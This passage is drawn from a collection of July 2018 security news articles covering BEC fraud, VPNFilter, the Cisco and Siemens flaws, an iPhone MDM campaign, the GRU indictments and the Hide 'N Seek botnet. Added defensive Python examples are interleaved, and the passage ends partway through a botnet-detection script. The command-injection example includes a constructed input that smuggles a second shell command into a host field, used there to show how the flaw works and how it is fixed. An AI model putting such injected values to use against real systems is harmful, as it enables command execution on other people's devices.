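    print(bec_indicators(SAMPLE_LEGIT, TRUSTED))    # []
```

None of these checks proves fraud on its own; the value is in several firing at once on a message that changes payment details, which is exactly the combination a title company or buyer can be trained to verify out of band.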
“Based on victim complaint data, BEC/EAC scams targeting the real estate sector are on the rise,” the FBI said. “From calendar year 2015 to calendar year 2017, there was over an 1100% rise in the number of BEC/EAC victims reporting the real estate transaction angle and an almost 2200% rise in the reported monetary loss. May 2018 reported the highest number of BEC/EAC real estate victims since 2015, and September 2017 reported the highest victim loss.”
The topic of BEC scams and how the threat can be prevented using human-powered intelligence was covered recently in a SecurityWeek column by Josh Lefkowitz, CEO of business risk intelligence firm Flashpoint.
“BEC underscores why even the most technically sophisticated cyber defenses aren’t always a match for low-tech threats. Combating BEC requires more than just advanced technologies and robust perimeter security—it requires humans to understand the threat,” Lefkowitz said.
Dark Web Chatter Helpful in Predicting Real World Hacks, Firm Says
18.7.2018 securityweek CyberCrime
Some hacks are serendipitous events for skiddies who happen across a website with an easily exploitable common vulnerability. Others, especially the major breaches of major enterprises, are planned and executed with care. Such planning often leaves traces of noise across the internet. IntSights, founded in 2015, searches both the surface and deep web for this noise, and converts it into actionable intelligence. It looks for evidence of planned attacks before they actually occur.
Financial services is one sector that is unlikely to fall to skiddie attacks. The bank heists of $4.4 million (NIC Asia Bank, November 2017), $60 million (Far Eastern Bank, October 2017) and $100 million (Post-Soviet Bank, Russia, February 2017) would have needed planning. IntSights is predicated on the idea that such planning may be detectable; and if detected, the attack can be mitigated.
It has found considerable growth in pre-attack indicators, matching the actual growth in real financial services attacks. An analysis (PDF) focuses on two categories of 'attack indicators' found on the internet: company or customer data offered for sale in a black market, and phishing email target lists. Based on this analysis, IntSights finds that financial organizations comprise the single most-attacked industry sector.
In the first six months of 2017, it found an average of 207 attack indicators per U.S. bank. By the first six months of 2018, this had risen to an average of 520 indicators per bank -- an increase of 151%.
These figures come from a similar year-on-year growth of 135% in instances of financial data being sold on dark web black markets, a 91% increase in corporate email addresses found on phishing target lists, a 40% increase in corporate credential leakage, and a 149% increase in stolen bank card information.
Following high-profile takedowns of major deep web marketplaces leading to arrests and prosecutions for the sale of illegal physical goods (such as drugs and guns), IntSights believes that these marketplaces are now concentrating on the sale of data. However, even this is evolving. While the deepest forums remain, criminals are increasingly untrustful of their fellow members -- and are shifting towards business hidden in plain sight on the surface web.
Over the same period, IntSights has seen a 49% growth in the creation of fake social media accounts -- or put another way, two new fake profiles targeting each individual bank per week.
"A fake profile," notes the report, "can lure users to phishing sites or downloading fake apps. It can pose as customer service and ask for confidential information. It can spread false information to misdirect the public, manipulate stock price or influence the public to buy or sell. Additionally, it can also be used to harvest personal data and enrich other personal data that the attacker might hold."
The report also notes that the three dominant hacking groups that attack the financial sector are Money Taker, Carbanak and Cobalt -- all believed to be situated in Russia. Money Taker is thought to be responsible for more than 20 successful attacks against financial institutions in the U.S., UK and Russia. Carbanak has been credited with more than 300 successful attacks on banks, financial institutions and retailers. Cobalt has been credited with the theft of $9.7 million from the Russian MetakkinvestBank; ATM thefts of $2.18 million from Taiwan banks; a SWIFT attack on Russian banks; and more than 200 other attacks on banks in Europe, Thailand, Turkey and Taiwan.
However, financial services aren't merely attacked by criminal gangs -- they also attract the attention of nation-state APT groups like Lazarus (North Korea). Lazarus has been credited with the 2014 attack on Sony Pictures; the WannaCry ransomware attack on multiple organizations around the world; the theft of $12 million from Banco del Austro in Ecuador; the theft of $1 million from Tien Phong Bank in Vietnam -- SWIFT attack; the theft of $81 million from the Central Bank of Bangladesh; the theft of $60 million from FEIB Bank in Taiwan; and the theft of $5 million from various banks in Nepal.
Based on its analysis of the activity it has tracked over the last 18 months, IntSights sees a continuously adapting and evolving financial services threat landscape -- some of which is already evident. Criminals will increasingly attack the supply chain, gaining access to large enterprises via their smaller suppliers. They will also look to compromise third-party software used by larger organizations -- a case in point being the recent Ticketmaster breach via Inbenta software.
IntSights also believes that direct extortion 'will become the new ransomware'. The huge fines that can be levied under new legislation such as the EU's General Data Protection Regulation (GDPR) will far exceed the amount that can be extorted by ransomware or the cost of recovering from ransomware. "Regulation fines and brand reputation damage," warns the report, "can be way more costly than downtime or lost data. Therefore, organizations are willing to pay more to not have a breach disclosed to the public, rather than pay to regain access to their data. Hackers will leverage this fear as a tactic to get more money."
Finally, IntSights notes that black market vendors are moving away from the deep web "to social media platforms (such as Facebook closed groups) and encrypted chat rooms (such as Telegram, ICQ and Jabber). We expect this trend to continue over the next year as it provides black market vendors with better privacy and secrecy."
"We see many financial organizations too focused on stopping direct attacks to their corporate systems," concludes Itay Kozuch, director of threat research at IntSights. "However, our research shows that cybercriminals have begun circumventing these defenses using social media, mobile application stores and phishing schemes.
"These tactics leverage an organization's brand and credibility to trick users and run scams, which can be even more costly and dangerous than direct attacks," he added. "We published our Financial Services Threat Landscape report to help these organizations widen their view of the threat landscape to not just protect against direct attacks, but protect their customers and prevent successful fraud."
Israel-born startup IntSights Cyber Intelligence raised $17 million in a Series C funding round led by Tola Capital in June 2018, bringing the total capital raised by the firm to $41.3 million.
VPNFilter Malware Hits Critical Infrastructure in Ukraine
18.7.2018 securityweek Virus
The Security Service of Ukraine (SBU) revealed this week that the VPNFilter malware, which it attributed to Russian intelligence agencies, had targeted a critical infrastructure organization.
According to the SBU, the malware was detected on the systems of the Aulska chlorine station in Auly, Dnipropetrovsk. The organization is part of the country’s critical infrastructure as it supplies chlorine to water treatment and sewage plants across Ukraine.
The malware reportedly targeted technological processes and safety systems, but the security agency said it quickly detected and blocked the attempt. The SBU said the attack could have resulted in technological process disruptions or a crash of the affected systems, which could have led to a “disaster.” The agency believes the attackers’ goal was to disrupt operations at the facility.
While the SBU’s statement suggests that this attack was specifically aimed at the chlorine station, it’s also possible that the organization was an opportunistic target. VPNFilter at one point had ensnared at least 500,000 routers and network-attached storage (NAS) devices, and Ukraine appears to be its main target.
Even after U.S. authorities disrupted VPNFilter by seizing one of its command and control (C&C) domains, researchers reported that the threat had continued to target devices in Ukraine.
The fact that Ukraine has attributed the VPNFilter attack to Russia is not surprising. Even the United States government has linked the operation to some cyber-espionage groups believed to be sponsored by the Kremlin.
The VPNFilter botnet, whose existence was brought to light in May, targets more than 50 types of routers and NAS devices from Linksys, MikroTik, Netgear, TP-Link, QNAP, ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.
The malware can intercept data passing through the compromised device, monitor the network for communications over the Modbus SCADA protocol, and use its destructive capabilities to render an infected device unusable.
This is not the first time an attack that targets Ukraine has been blamed on Russia. Moscow has also been accused of launching the NotPetya attack and campaigns aimed at Ukraine’s power grid.
Support for Python Packages Added to GitHub Security Alerts
18.7.2018 securityweek Security
GitHub announced on Thursday that developers will be warned if the Python packages used by their applications are affected by known vulnerabilities.
The code hosting service last year introduced a new feature, the Dependency Graph, that lists the libraries used by a project. It later extended it with a capability designed to alert developers when one of the software libraries used by their project has a known security hole.
“We’ve chosen to launch the new platform offering with a few recent vulnerabilities,” GitHub said in a blog post. “Over the coming weeks, we will be adding more historical Python vulnerabilities to our database.”
The security alerts feature is powered by information collected from the National Vulnerability Database (NVD) and other sources. When a new flaw is disclosed, GitHub identifies all repositories that use the affected version and informs their owners.
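The matching step described above is simple to reproduce for a single project: read the dependency manifest, normalize package names, and test each pinned version against the affected range in an advisory. The following is an added example that imitates that idea and is not GitHub's code. The requirements text and the advisory list are constructed for the demo, and the advisory IDs are placeholders rather than real identifiers; the range syntax handled is a subset of PEP 440 comparisons (`<`, `<=`, `==`, `>`, `>=`, comma-joined).

```python
"""Match pinned Python requirements against a vulnerability database.

Added example, not GitHub's code: it imitates the Dependency Graph idea
(parse the project's dependency manifest, flag versions in a known-bad range).
The requirements text and the advisory list are constructed for the demo;
the advisory IDs are placeholders, not real identifiers.
"""
import re

# Constructed manifest, in requirements.txt syntax.
REQUIREMENTS = """\
# web stack
flask==0.12.2
requests==2.19.1   # pinned
pyyaml == 3.12
Jinja2==2.10
"""

# Constructed advisories: (package, affected range, placeholder id).
ADVISORIES = [
    ("pyyaml", "<4.1", "ADVISORY-PLACEHOLDER-1"),
    ("flask", ">=0.10,<1.0", "ADVISORY-PLACEHOLDER-2"),
    ("requests", "<2.19.0", "ADVISORY-PLACEHOLDER-3"),
]

_REQ_LINE = re.compile(r"^\s*([A-Za-z0-9_.-]+)\s*==\s*([0-9][0-9A-Za-z.]*)")
_CMP = re.compile(r"^(<=|>=|==|<|>)\s*([0-9][0-9A-Za-z.]*)$")


def normalize(name):
    """Package names compare case-insensitively with '-', '_' and '.' equivalent."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_version(v):
    """Turn '2.19.1' into (2, 19, 1); non-numeric parts are dropped."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def compare(a, b):
    """-1, 0 or 1 for a<b, a==b, a>b; trailing zeros are insignificant (1.0 == 1.0.0)."""
    ta, tb = parse_version(a), parse_version(b)
    n = max(len(ta), len(tb))
    ta += (0,) * (n - len(ta))
    tb += (0,) * (n - len(tb))
    return (ta > tb) - (ta < tb)


OPS = {
    "<": lambda c: c < 0, "<=": lambda c: c <= 0, "==": lambda c: c == 0,
    ">": lambda c: c > 0, ">=": lambda c: c >= 0,
}


def in_range(version, spec):
    """True when version satisfies every comma-separated clause of spec."""
    for clause in spec.split(","):
        m = _CMP.match(clause.strip())
        if not m:
            raise ValueError(f"unsupported clause: {clause!r}")
        op, bound = m.groups()
        if not OPS[op](compare(version, bound)):
            return False
    return True


def parse_requirements(text):
    """Return [(normalized_name, version)] for every '==' pin; comments and other lines are skipped."""
    pins = []
    for line in text.splitlines():
        line = line.split("#", 1)[0]
        m = _REQ_LINE.match(line)
        if m:
            pins.append((normalize(m.group(1)), m.group(2)))
    return pins


def find_vulnerable(requirements_text, advisories):
    """Return (name, version, advisory_id) for each pin that falls in an affected range."""
    hits = []
    for name, version in parse_requirements(requirements_text):
        for pkg, spec, advisory_id in advisories:
            if normalize(pkg) == name and in_range(version, spec):
                hits.append((name, version, advisory_id))
    return hits


if __name__ == "__main__":
    for name, version, advisory_id in find_vulnerable(REQUIREMENTS, ADVISORIES):
        print(f"Known security vulnerability: {name}=={version} ({advisory_id})")
```

Only exact `==` pins are evaluated here; a real service also has to resolve unpinned or range-specified dependencies to the version actually installed, which is why lock files make this kind of alerting far more reliable.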
The security alerts are enabled by default for public repositories, but the owners of private repositories will have to manually enable the feature.
When a vulnerable library is detected, a “Known security vulnerability” alert will be displayed next to it in the Dependency Graph. Administrators can also configure email alerts, web notifications, and warnings via the user interface, and they can configure who should see the alerts.
GitHub reported in March that the introduction of the security alerts led to a significant decrease in the number of vulnerable libraries on the platform.
When the feature was launched, GitHub’s initial scan revealed over 4 million vulnerabilities across more than 500,000 repositories. Roughly two weeks after the first notifications were sent out, over 450,000 of the flaws were addressed by updating the impacted library or removing it altogether.
Cisco Patches High Risk Flaws in StarOS, IP Phone
18.7.2018 securityweek Vulnerebility
Cisco this week released a set of security patches to address several vulnerabilities in its products, including High risk issues impacting StarOS and 6800, 7800, and 8800 Series IP Phones.
The first High severity bug (CVE-2018-0369) impacts the reassembly logic for fragmented IPv4 packets of Cisco StarOS running on virtual platforms. By abusing this security flaw, an unauthenticated remote attacker could trigger a reload of the npusim process, thus causing denial of service (DoS).
An attacker could trigger the simultaneous reload of all four instances of the npusim process that are running per Service Function (SF) instance.
According to Cisco, the vulnerability resides in the improper handling of fragmented IPv4 packets containing options. Thus, an attacker could exploit the issue by sending a malicious IPv4 packet across an affected device.
“An exploit could allow the attacker to trigger a restart of the npusim process, which will result in all traffic queued toward this instance of the npusim process to be dropped while the process is restarting. The npusim process typically restarts within less than a second,” Cisco explains in an advisory.
Impacted products include Cisco Virtualized Packet Core-Single Instance (VPC-SI), Cisco Virtualized Packet Core-Distributed Instance (VPC-DI), and Cisco Ultra Packet Core (UPC) running StarOS operating system releases prior to the fixed version.
The second High risk flaw (CVE-2018-0341) addressed this week impacts the web-based UI of Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware and could be exploited by an authenticated, remote attacker for command injection.
“The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by including arbitrary shell commands in a specific user input field,” Cisco says.
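The pattern Cisco describes, user text from a form field reaching a shell, is the same whether it lives in phone firmware or a web application. The following is an added example and not Cisco's code; the advisory does not say which field was affected, so a "ping a host" diagnostic is an assumed stand-in, and the hostname regex is this example's own allowlist. It shows the unsafe string-building form beside the hardened form (validated argv, no shell).

```python
"""Command injection: the unsafe pattern behind CVE-2018-0341-style bugs, and its fix.

Added example, not Cisco's code. The advisory says only that a user input field
in the phones' web UI reached a shell without adequate validation; the 'ping a
host' diagnostic below is an assumed stand-in for that field.
"""
import re
import subprocess

# Allowlist for a hostname or IPv4 literal: dot-separated labels of letters,
# digits and inner hyphens, 253 chars max. A leading '-' is rejected, so the
# value can never be parsed as an option flag by the command it is passed to.
_HOST_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*$"
)


def vulnerable_command(host):
    """What the unsafe pattern hands to '/bin/sh -c': user text spliced into a string.

    Anything after ';', '|', '&&' or inside $( ) is interpreted by the shell as a
    second command, so the field becomes arbitrary command execution.
    """
    return f"ping -c 1 {host}"


def validate_host(host):
    """Allowlist check; reject rather than try to strip 'bad' characters."""
    if not _HOST_RE.match(host):
        raise ValueError("invalid host")
    return host


def safe_command(host):
    """argv list for subprocess with shell=False: no metacharacter is ever interpreted."""
    return ["ping", "-c", "1", validate_host(host)]


def run_diagnostic(host):
    """Hardened runner: validated argv, no shell, bounded runtime."""
    return subprocess.run(safe_command(host), shell=False,
                          capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    hostile = "10.0.0.1; echo injected"   # constructed hostile input
    print("unsafe string:", vulnerable_command(hostile))
    print("safe argv    :", safe_command("10.0.0.1"))
    try:
        safe_command(hostile)
    except ValueError as exc:
        print("rejected     :", exc)
```

The two defenses are independent and both matter: the argv form removes the shell from the path entirely, and the allowlist keeps the value from being misread by the invoked program itself.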
In addition to these two bugs, Cisco addressed six Medium severity issues in Web Security Appliance (WSA), FireSIGHT System Software, Firepower System Software, and Digital Network Architecture (DNA).
Exploitation of these vulnerabilities could result in denial of service, bypass of file policy, bypass of URL-based access control policy, and cross-site scripting (XSS) attacks, Cisco’s advisories reveal.
Flaws Expose Siemens Protection Relays to DoS Attacks
18.7.2018 securityweek ICS
Siemens has informed customers that some of the company’s SIPROTEC protection relays are exposed to denial-of-service (DoS) attacks due to a couple of vulnerabilities present in the EN100 communication module.
SIPROTEC devices provide control, protection, measurement and automation functions for electrical substations. These products use the EN100 ethernet module for IEC 61850, PROFINET IO, Modbus, DNP3 and IEC 104 communications.
Researchers at ScadaX, an independent group of experts focusing on ICS and IoT security, discovered that the EN100 module and SIPROTEC 5 relays are impacted by two DoS vulnerabilities that can be exploited by sending specially crafted packets to the targeted device’s TCP port 102.
Exploitation of the flaws causes the device’s network functionality to enter a DoS condition, which Siemens says compromises the system’s availability. Manual intervention is required to restore the impacted service.
An attacker needs access to the targeted organization’s network and IEC 61850-MMS communication needs to be enabled in order to exploit the flaws, but no user interaction is required.
The vulnerabilities are similar, but one of them, tracked as CVE-2018-11451, has been classified as “high severity,” while the other, CVE-2018-11452, which impacts the EN100 module if oscillographs are running, has been rated “medium severity.” Siemens noted that SIPROTEC 5 relays are only affected by the more serious flaw.
Siemens has released firmware updates for some of the impacted devices to address the flaws, and advised users to block access to port 102 with an external firewall to prevent attacks on systems for which patches have yet to be made available.
Industry professionals have often warned that DoS vulnerabilities are far more severe in the case of industrial control systems compared to regular IT systems due to the fact that they impact availability, which is a top priority in industrial environments.
In the case of Siemens’ SIPROTEC relays, the threat is not just theoretical. Researchers reported last year that the attackers behind the Industroyer/Crashoverride malware, which was linked to the December 2016 attack on an electrical substation in Ukraine, had also developed a DoS tool that exploited CVE-2015-5374 to cause SIPROTEC relays to become unresponsive.
Attackers Target iPhones Using Open Source MDM Solution
18.7.2018 securityweek Apple
Recently discovered cyber attacks targeting iPhone users have been using an open source mobile device management (MDM) system to control enrolled devices, Talos reports.
Enrollment of targeted devices could be performed via physical access or social engineering, but Talos could not determine which method the attackers used. As part of a highly targeted campaign, the attackers went to great lengths in their attempt to replace specific apps and intercept user data.
With the use of the MDM solution, the actor deployed five applications to the 13 targeted devices in India. As a result, they were able to steal SMS messages, view the device location, and exfiltrate data. Apple has been informed of the attack and has already acted against the certificates the attackers used.
Talos security researchers discovered that the attackers added features to legitimate apps (including WhatsApp and Telegram) using the BOptions sideloading technique. Then, the MDM was used to deploy the apps onto targeted devices.
The injected malicious code could gather and steal information such as phone number, serial number, location, contacts, user's photos, SMS and Telegram and WhatsApp chat messages.
The malware appears to have been in use since August 2015, logs on the MDM server and the command and control (C&C) server reveal. Based on other information found on these servers, Talos believes that the malware author works out of India.
The two MDM servers used by the attackers are based on the small, open-source project mdm-server. Through MDM, admins can control multiple devices from a single location, can install and remove apps and certificates, lock the device, change password requirements, and more.
The enrollment process, however, requires user interaction at each step, which suggests that social engineering was used as part of the attack. Most likely, users were advised to install the attacker’s certificate to allow enrollment, and the use of a domain such as "ios-certificate-update[.]com" helped them trick users.
The attacker used a certificate issued in September 2017 for an email address located in Russia, which is believed to be a false flag, as the attacker isn’t located in Russia. The certificates are either self-signed or signed by the Comodo certificate authority.
According to Talos, the affected devices, all located in India, include the following models: iPhone 5.4, iPhone 7.2, iPhone 8.1, iPhone 8.2, iPhone 9.3, and iPhone 9.4. The operating system versions include 10.2.1, 10.3.1, 10.3.2, 10.3.3, 11.0, 11.0.3, 11.2.1, 11.2.5, and 11.2.6.
While there’s no information available on how the 13 devices were enrolled in the MDM, the attacker likely tested the solution on their own iPhone, the researchers say.
The attack, however, appears focused on deploying malicious apps onto the compromised devices to steal information. The attacker injected code into applications such as AppsSLoader, Telegram, WhatsApp, PrayTime, and MyApp and then loaded them onto the targeted iPhones.
The malicious Telegram and WhatsApp versions were observed sending the collected information to a server that has been active since August 2015.
“At the time, it is unclear who the targets of the campaign were, who was the perpetrator, or what the exact purpose was. It's very likely the vector for this campaign was simply social engineering - in other words asking the user to click "ok". This type of vector is very difficult to defend against since users can often be tricked into acting against their best interests,” Talos concludes.
12 Russian Intelligence Officers Indicted for Hacking U.S. Democrats
18.7.2018 securityweek BigBrothers
Twelve Russian intelligence officers were indicted by a US grand jury on Friday -- just three days before President Donald Trump is scheduled to meet with Russia's Vladimir Putin -- for interfering in the November 2016 presidential election.
The charges were drawn up by Special Counsel Robert Mueller, the former FBI director who is looking into Russian interference in the 2016 vote and whether any members of Trump's campaign colluded with Moscow.
The indictment accuses members of Russia's military intelligence agency known as the GRU of carrying out "large-scale cyber operations" to steal Democratic Party documents and emails.
Deputy Attorney General Rod Rosenstein, who announced the indictment at a press conference in Washington, said "there's no allegation in this indictment that any American citizen committed a crime."
Rosenstein said "the conspirators corresponded with several Americans during the course of the conspiracy through the internet."
However, "there's no allegation in this indictment that the Americans knew they were corresponding with Russian intelligence officers," he said.
Rosenstein also stressed that "there's no allegation that the conspiracy changed the vote count or affected any election result."
Rosenstein said he briefed Trump about the indictment before Friday's announcement and that the timing was determined by "the facts, the evidence, and the law."
The deputy attorney general's press conference came as Trump was meeting Queen Elizabeth II and just three days before his meeting with Putin in Helsinki.
- Calls to cancel Putin meeting -
Senator Chuck Schumer, the Democratic Senate minority leader, immediately called on Trump to cancel the Putin talks.
"These indictments are further proof of what everyone but the president seems to understand: President Putin is an adversary who interfered in our elections to help President Trump win," Schumer said in a statement.
"President Trump should cancel his meeting with Vladimir Putin until Russia takes demonstrable and transparent steps to prove that they won't interfere in future elections," he said.
Speaking earlier Friday, before the indictments were announced, Trump said he would ask Putin about the allegations of Russian election meddling.
"I will absolutely, firmly ask the question, and hopefully we'll have a good relationship with Russia," he told a joint press conference with British Prime Minister Theresa May.
But he simultaneously denounced the Mueller investigation as a "rigged witch hunt," and said he has been "tougher on Russia than anybody."
"We have been extremely tough on Russia," Trump said.
The US president recalled that 60 intelligence officers were expelled from the Russian embassy in Washington in response to a nerve agent attack on a former Russian spy in Britain.
Russia has denied any involvement in the attack and rejected accusations that it interfered in the US presidential election in a bid to bring about the defeat of Democrat Hillary Clinton.
Rosenstein said 11 of the Russians indicted Friday were charged with "conspiring to hack into computers, steal documents, and release those documents with the intent to interfere in the election.
"One of those defendants and a 12th Russian are charged with conspiring to infiltrate computers of organizations involved in administering elections," he added.
"The defendants accessed email accounts of volunteers and employees of a US presidential campaign, including the campaign chairman starting in March of 2016," the deputy attorney general said.
"They also hacked into the computer networks of a congressional campaign committee and a national political committee."
Trump Says 'Might' Ask Putin to Extradite Accused Russian Hackers
18.7.2018 securityweek Hacking
Donald Trump has said he may ask Vladimir Putin during their upcoming summit meeting to extradite to the US 12 Russian intelligence officers accused of attempting to interfere with the 2016 presidential election.
Speaking in an interview with CBS Evening News conducted on Saturday ahead of his meeting with the Russian leader in Helsinki on Monday, the US president also sought to temper expectations about how much could be achieved.
Asked whether he would press his Russian counterpart to send to the US members of the Russian military intelligence agency accused of hacking Hillary Clinton's failed presidential campaign, he said: "Well, I might.
"I hadn't thought of that. But I certainly, I'll be asking about it, but again, this was during the Obama administration. They were doing whatever it was during the Obama administration," he told CBS's Jeff Glor on "Face the Nation."
Speaking before the summit in Helsinki, Trump added that his Republican Party had also been the target of Russian hacking efforts but had superior cyber security measures in place.
"I think the DNC (Democratic National Committee) should be ashamed of themselves for allowing themselves to be hacked," he said. "They had bad defenses and they were able to be hacked. But I heard they were trying to hack the Republicans too. But -- and this may be wrong -- but they had much stronger defenses."
CNN reported in January last year that then-FBI Director James Comey told a Senate panel that "old emails" of the Republican National Committee had been the target of hacking -- but the material was not publicly released -- and there was no sign the current RNC or the Trump campaign had been successfully hacked.
The indictments issued Friday by special counsel Robert Mueller allege that the Russian hackers publicly released tens of thousands of stolen Democratic emails and documents using "fictitious online personas."
Mueller is investigating possible collusion between Trump's campaign and Russia.
"If the Russians wanted to exfiltrate data from the RNC and use it against Donald Trump, they would have done so," Democratic Congressman Adam Schiff said on CNN's "State of the Union" Sunday.
While Trump blamed the administration of former president Barack Obama, not Russia, after the indictments, US ambassador to Moscow Jon Huntsman said Sunday that "Russia is guilty of involvement and mischief in our election this last go-around."
He said the summit is important as the start of a dialogue, not only about election meddling but a range of issues.
- At boiling point -
Huntsman said on "Fox News Sunday" that Trump "is genuinely looking forward to sitting across the table and trying to reduce the tension in a relationship where our collective blood pressure is off-the-charts high."
The two presidents have shared personal bonhomie in the past, but beyond the alleged hacking of the US election, their countries are deeply divided on a host of other issues including Syria and Ukraine.
Before coming to Europe, Trump predicted his meeting with Putin could be the "easiest" stage of a tour that included stops in Brussels and Britain.
But he told CBS that he was going into it with "low expectations."
Trump also defended his decision to hold the meeting after opposition Democrats, and Republican Senator John McCain, said the summit should be canceled in the wake of the indictments.
"I believe it's really good. So having meetings with Russia, China, North Korea, I believe in it. Nothing bad is going to come out of it, and maybe some good will come out," the president said in broadcast excerpts. The rest of the interview will air on Monday.
Trump told CBS that "Russia is a foe in certain respects," and also named the European Union and China as "foes" economically, over trade practices for which Washington has imposed sanctions, sparking a trade war.
US National Security Adviser John Bolton said that, after the indictments, Trump "can put this on the table and say, this is a serious matter that we need to talk about."
He told ABC's "This Week" that "it's very important that the president has a direct one-on-one conversation" with Putin, and European leaders have expressed support for it.
Over 100 Vulnerabilities Patched in Adobe Acrobat, Reader
18.7.2018 securityweek Vulnerability
Adobe on Tuesday released security updates that patch 105 vulnerabilities in Acrobat and Reader, two in Flash Player, three in Experience Manager, and three in Connect.
The latest versions of Acrobat and Reader for Windows and macOS address dozens of critical memory corruption bugs that can allow remote code execution, including double-free, heap overflow, use-after-free, out-of-bounds write, type confusion, untrusted pointer dereference, and buffer error issues.
The list of weaknesses fixed with this month’s Patch Tuesday updates also includes a critical privilege escalation and dozens of important out-of-bounds read issues that lead to information disclosure.
Over two dozen researchers have been credited for responsibly disclosing these flaws to Adobe. Many of the security holes were reported to the vendor through Trend Micro’s Zero-Day Initiative (ZDI).
In the case of Flash Player, the updated version resolves a critical type confusion issue that can lead to code execution and a flaw rated important that can result in information disclosure.
Hotfixes released by Adobe for Experience Manager patch three server-side request forgery (SSRF) vulnerabilities that can lead to the exposure of sensitive information, but none of the flaws are considered critical.
Finally, updates released for Adobe Connect fix authentication bypass and insecure library loading flaws that have been assigned medium and important severity ratings.
Adobe says it’s not aware of any malicious exploitation attempts for the vulnerabilities patched with this round of updates and the company does not expect to see attacks leveraging these flaws any time soon.
PE Firm Thoma Bravo Buys Majority Stake in Centrify
18.7.2018 securityweek IT
Private equity investment firm Thoma Bravo said it will acquire a majority interest in identity and access management (IAM) solutions firm Centrify.
Financial details were not disclosed; the deal is expected to close in the third quarter of this year.
Founded in 2004, Centrify has raised a total of $94 million in funding to date, and offers a unified platform that provides Privileged Identity Management (PIM) and Identity-As-A-Service (IDaaS).
The Santa Clara, California-based company serves over five thousand customers around the world in industries including defense, banking, energy, retail, manufacturing and health care.
Thoma Bravo has made several large investments in the cybersecurity space over the years. In May 2018, it announced that it would acquire a majority interest in Security Information and Event Management (SIEM) solutions vendor LogRhythm. Other cybersecurity investments include SonicWall, SailPoint, Hyland Software, Deltek, Blue Coat Systems, Imprivata, Bomgar, Barracuda Networks, Compuware and SolarWinds.
“With Thoma Bravo’s extensive sector experience and insight in the enterprise security software space, Centrify is in a strong position to provide our products, services and unique expertise to meet the rising need for identity-based cybersecurity technology in today’s global environment,” Tom Kemp, co-founder and CEO of Centrify, said in a statement.
Hide 'N Seek IoT Botnet Can Infect Database Servers
18.7.2018 securityweek BotNet
The Hide 'N Seek Internet of Things (IoT) botnet has recently added support for more devices and can also infect OrientDB and CouchDB database servers, Qihoo 360's NetLab researchers say.
When first detailed in January this year, the botnet was evolving and spreading rapidly, ensnaring tens of thousands of devices within days. Targeting numerous vulnerabilities, the malware was capable of data exfiltration, code execution, and interference with the device operation.
By early May, the malware had infected over 90,000 devices, added code to target more vulnerabilities, and also adopted persistence, being able to survive reboots. The persistence module, however, would only kick in if the infection was performed over the Telnet service.
A peer-to-peer (P2P) botnet, Hide 'N Seek has continued to evolve, and is currently targeting even more vulnerabilities than before. The botnet now also includes exploits for AVTECH devices (webcam) and Cisco Linksys routers, Qihoo 360's NetLab reveals.
Furthermore, the malware now includes 171 hardcoded P2P node addresses, has added a crypto-currency mining program to its code, and has also evolved into a cross-platform threat, with the addition of support for OrientDB and CouchDB database servers.
The botnet’s spreading mechanism includes a scanner borrowed from Mirai that probes the fixed TCP ports 80, 8080, 2480 (OrientDB’s HTTP interface), 5984 (CouchDB) and 23, as well as other random ports.
For infection, the malware attempts remote code execution using exploits targeting TP-Link routers, Netgear routers (also targeted by the Reaper botnet and the Mirai variant Wicked), AVTECH cameras, Cisco Linksys routers, JAW/1.0, OrientDB, and Apache CouchDB.
The Hide 'N Seek bots attempt to contact other P2P peers using one of three methods: a hard-coded built-in list of 171 peer addresses, command-line arguments, and via other P2P peers. The node would also interact with the 171 peers for check-in purposes and during the follow-up interaction process.
“When started with no command-line args, HNS node will send lots of UDP check-in packets. IP addresses of these packets are randomized, while some others are set based on the built-in list,” the NetLab researchers explain.
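The scanner and check-in behaviour described above gives a defender something concrete to look for: one internal host fanning out to many destinations on the Mirai-style port set, and the same host spraying UDP check-ins at many unrelated addresses. The following Python is an added example for this page, not NetLab’s code and not anything shipped with the malware; the log line format, the sample lines and the fan-out thresholds are all constructed for illustration and would need tuning against a real baseline.

```python
"""Flag hosts whose connection pattern matches the Hide 'N Seek spreader.

Added example (not NetLab's code).  Input is a constructed connection log in the
form "<timestamp> <tcp|udp> <src>:<sport> -> <dst>:<dport>", one record per line.
Two heuristics:
  * TCP sweep: one source touching many distinct destinations on the fixed
    ports the article lists (23, 80, 8080, 2480, 5984).
  * UDP fan-out: one source sending to many distinct destinations, which is
    what the randomized check-in packets look like from the inside.
"""
import re
from collections import defaultdict

# Fixed TCP ports probed by the Mirai-derived scanner.
HNS_SCAN_PORTS = {23, 80, 8080, 2480, 5984}
# Assumed thresholds for this toy window; tune against your own traffic.
MIN_TCP_TARGETS = 4
MIN_UDP_TARGETS = 6

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>tcp|udp)\s+"
    r"(?P<src>\d+\.\d+\.\d+\.\d+):(?P<sport>\d+)\s*->\s*"
    r"(?P<dst>\d+\.\d+\.\d+\.\d+):(?P<dport>\d+)$"
)

# Constructed sample: 10.0.0.5 sweeps Telnet/HTTP/DB ports across several hosts
# and sprays UDP to unrelated addresses; 10.0.0.7 is an ordinary client.
SAMPLE_LOG = """\
2018-07-17T10:00:01 tcp 10.0.0.5:41000 -> 203.0.113.10:23
2018-07-17T10:00:01 tcp 10.0.0.5:41001 -> 203.0.113.11:23
2018-07-17T10:00:02 tcp 10.0.0.5:41002 -> 198.51.100.4:2480
2018-07-17T10:00:02 tcp 10.0.0.5:41003 -> 198.51.100.9:5984
2018-07-17T10:00:03 tcp 10.0.0.5:41004 -> 192.0.2.77:8080
2018-07-17T10:00:03 udp 10.0.0.5:9000 -> 203.0.113.50:17500
2018-07-17T10:00:03 udp 10.0.0.5:9000 -> 198.51.100.60:17500
2018-07-17T10:00:04 udp 10.0.0.5:9000 -> 192.0.2.61:17500
2018-07-17T10:00:04 udp 10.0.0.5:9000 -> 203.0.113.62:17500
2018-07-17T10:00:04 udp 10.0.0.5:9000 -> 198.51.100.63:17500
2018-07-17T10:00:05 udp 10.0.0.5:9000 -> 192.0.2.64:17500
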